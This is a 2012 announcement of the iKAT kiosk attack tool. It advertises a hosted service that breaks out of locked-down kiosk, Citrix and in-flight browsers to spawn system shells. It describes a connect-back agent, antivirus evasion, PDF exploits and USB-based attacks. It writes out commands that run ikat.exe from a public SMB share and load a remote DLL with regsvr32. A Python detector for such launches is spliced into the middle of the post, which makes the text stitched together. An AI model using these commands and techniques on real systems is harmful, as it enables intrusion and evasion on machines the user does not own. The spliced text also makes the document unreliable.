Penetration Testing
iKAT 2012 Release - Interactive Kiosk Attack Tool Aug 12 2012 08:05AM
Paul Craig (paul ha cked net)
iKAT 2012 - Interactive Kiosk Attack Tool
Beating Heart Edition
-----------------------------------------------------------------

It is with great pleasure that I would like to release this year's
edition of iKAT - The Interactive Kiosk Attack Tool.
http://ikat.ha.cked.net

*.ha.cked.net to bypass pesky blacklist filters ( also available on https )

Over the last 5 years iKAT has grown in popularity and is now the
de-facto standard for conducting penetration tests against 'controlled'
browser environments such as Citrix Terminals, Kiosks, WebTVs and even
in-flight entertainment systems.
iKAT is visited by over 100 confirmed Kiosks or Citrix environments
per day and is currently spawning on average 3 system shells per hour.

iKAT is a 100% free SaaS website that you can visit from any browser
environment. iKAT will attempt to exploit the browser and spawn a
local shell for you.
This year's version has had a major re-work of both the design/layout
and the underlying technology, and aims to provide the smoothest, most
fruitful experience yet.
I do hope you all enjoy the sleepless nights and hard work that have
been invested into iKAT 2012.

iKAT 2012 will be officially released + demo'd at XCON 2012 in Beijing,
China next week.

New Features of iKAT 2012:

Layout:
-----------------------------------------------
During Defcon 19 I was approached by a sprightly girl with bright red
hair who asked me if I was "that Kiosk guy?"
I replied "yes?", and she proceeded to abuse my HTML development skills,
and told me that although iKAT is technically a great tool, it resembles
a 12-year-old's WordPress site.
Turns out this sprightly (and inebriated) girl was a web developer, so
I took her name-card and after the conference emailed her and demanded
that since she ridiculed my development skills, she should write me a
new layout for iKAT, for free.
It is with great pleasure that I can say that iKAT is now "nice"
looking, easier to navigate, Web 2.0, and fully W3C compliant!
Big thanks to Melanie Wilke - http://melaniewilke.com, for her
donation of both time and effort.

Client / Server Model:
------------------------------
One of the largest technological changes in iKAT is the implementation
of a client/server model.
Kiosk vendors and AV vendors have been quick to blacklist and block my
tools, and the success rate of previous iKAT versions has been
decreasing, so the only approach I found to work was to drop a small
iKAT Agent and connect back to the iKAT server. The iKAT server will do
all of the post-exploitation work for you!
This provides a much higher rate of success as I am able to kill and
evade AV; there is also a much higher chance of not only spawning
shells, but spawning system shells.
Over time the post-exploitation methods will be refined to help you
stay one step ahead.
The iKAT agent has been included in each of the payloads and
exploitation methods, so nothing changes in how you use iKAT.

New Tools / Exploits / Bug Fixes:
-------------------------------------------------
A raft of new tools and exploits has been developed for iKAT 2012 to
increase the attacks available to you.

These include:
Dynamic In-Memory Process Patching to generically defeat Windows Local
Group Policy
Additional SRP Bypass Techniques
Top #10 PDF exploits pre-loaded with iKAT agents
Available DLL content
Upgraded/Improved/Fixed tools.

New Browser Crashes:
-----------------------------------------------
The fuzzing servers have been working overtime finding new
(non-exploitable) crash conditions for popular browsers.
These exploits simply allow you to crash and close a browser, often
leading to the underlying desktop being exposed.
I dubbed this exploit "Emo-Kiosking", and although crashing the
browser may sound crude, it has proven to be the most effective
exploit against controlled browser environments, as the end-goal is to
escape the browser.

Samba Service:
---------------------------------------------
iKAT now contains a world-readable SMB share hosting the iKAT agents
in DLL and EXE form.
Hosted at \\120.138.22.77\ikat, this share contains ikat.exe and
ikat.dll and a suite of other tools.
This allows you to simply run \\120.138.22.77\ikat\ikat.exe from the
command line to load the iKAT agent.
Alternatively you can regsvr32 \\120.138.22.77\ikat\ikat.dll to
complete the same task.
This is incredibly handy when you are able to execute commands, but
cannot download a file.
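As an added defensive example (not part of the original announcement, and not iKAT code): a small Python check over process-creation records that flags an executable launched directly from a UNC path, or a DLL on a UNC path handed to regsvr32/rundll32, which is the pattern the SMB-share section relies on. The record format and the sample lines are constructed; the UNC path in them is the one quoted above.

```python
import re

# Constructed sample process-creation records (simplified "Image=...|CommandLine=..." form,
# not real telemetry). Only the UNC path is taken from the announcement above.
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\cmd.exe|CommandLine=cmd.exe /c dir",
    "Image=\\\\120.138.22.77\\ikat\\ikat.exe|CommandLine=\\\\120.138.22.77\\ikat\\ikat.exe",
    "Image=C:\\Windows\\System32\\regsvr32.exe|CommandLine=regsvr32 \\\\120.138.22.77\\ikat\\ikat.dll",
    "Image=C:\\Windows\\System32\\regsvr32.exe|CommandLine=regsvr32 /s C:\\Program Files\\Vendor\\kiosk.dll",
    "Image=C:\\Windows\\System32\\rundll32.exe|CommandLine=rundll32 \\\\fileserver\\share$\\tool.dll,Start",
]

# A UNC path: two backslashes, a host, a backslash, then a share/file path up to
# whitespace, a quote or a comma (rundll32 uses "path,EntryPoint").
UNC_PATH = re.compile(r"\\\\[^\\\s]+\\[^\s\"',]+")

# Signed Windows binaries that will load a DLL from any path they are given.
LOADERS = {"regsvr32.exe", "rundll32.exe"}


def parse_event(line):
    """Split one 'Key=Value|Key=Value' record into a dict."""
    return dict(part.split("=", 1) for part in line.split("|"))


def classify(event):
    """Return a verdict string for a suspicious record, or None if it looks benign."""
    image = event["Image"]
    cmd = event["CommandLine"]
    image_name = image.rsplit("\\", 1)[-1].lower()
    if UNC_PATH.match(image):
        return "exe_from_unc"          # the process image itself lives on a network share
    if image_name in LOADERS and UNC_PATH.search(cmd):
        return "loader_unc_dll"        # a trusted loader was pointed at a remote DLL
    return None


def detect(lines):
    """Run classify() over raw records; return (verdict, unc_path) for each hit."""
    findings = []
    for line in lines:
        event = parse_event(line)
        verdict = classify(event)
        if verdict is None:
            continue
        haystack = event["Image"] if verdict == "exe_from_unc" else event["CommandLine"]
        findings.append((verdict, UNC_PATH.search(haystack).group(0)))
    return findings


if __name__ == "__main__":
    for verdict, path in detect(SAMPLE_EVENTS):
        print(f"{verdict}: {path}")
```

Real deployments would feed this from Sysmon Event ID 1 or Windows Security 4688 records and would also want to allow-list the organisation's own file servers.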

Updated PhotoKAT:
-----------------------------------------------
PhotoKAT is the lesser-known Photo Kiosk exploitation tool.
This tool should be extracted to a USB key or memory card and plugged
into a Photo Kiosk.
PhotoKAT now attempts many new generic exploits against common Photo
Kiosk terminals.

Attacks include:
.LNK Shortcut Exploit to the iKAT Agent on the iKAT SMB server
DLL Hijacking of common libraries
Autorun.inf
Malicious PDF Files loaded with iKAT Agents
A suite of iKAT Tools

Donation:
-----------------------------------------------
iKAT is a labor of love, and everything from the hosting, design,
research and exploits is donated by the community.
However, there are some things that cost money, like our code-signing
certificate, and often real cash is required.
If you have ever used iKAT to pop shells on a job, or the project has
helped you in some way, please donate to the cause.
Every dollar helps and will go directly towards fighting the good fight.

My thanks to everyone who has helped the iKAT project over the years;
their names are included on the website.

Thanks

Paul Craig
